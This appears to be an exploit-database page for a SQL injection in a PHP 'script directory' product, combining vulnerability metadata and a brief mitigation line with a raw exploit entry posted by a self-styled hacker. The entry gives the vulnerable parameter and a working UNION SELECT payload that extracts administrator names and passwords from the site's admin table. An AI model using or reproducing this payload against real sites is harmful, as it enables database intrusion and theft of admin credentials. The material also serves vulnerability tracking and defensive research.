header-logo
Suggest Exploit
vendor:
Script Directory Software
by:
BorN To K!LL - h4ck3r
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Script Directory Software
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
n/a

PHP script directory software

The vulnerability exists due to insufficient sanitization of user-supplied input in 'sbcat_id' parameter of 'showcats.php' script. A remote attacker can execute arbitrary SQL commands in application's database, cause denial of service, access or modify sensitive data, exploit various vulnerabilities in the underlying SQL server software, etc.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

==
Author: BorN To K!LL - h4ck3r
Contact: SQL@hotmail.co.uk
==
Script: PHP script directory software
Version: n/a
Link: http://www.softbizsolutions.com/script-directory-software.php
==
3xploit:
[path]/showcats.php?sbcat_id=[SQL-Injection]

3xample:
[path]/showcats.php?sbcat_id=-9999+union+all+select+1,concat(sbadmin_name,0x3a,sbadmin_pwd),3,4,5+from+sbrrs_admin--

==
Greetings:
darkc0de team, AsbMay's group, w4ck1ng team , and "Kuwaitis"
==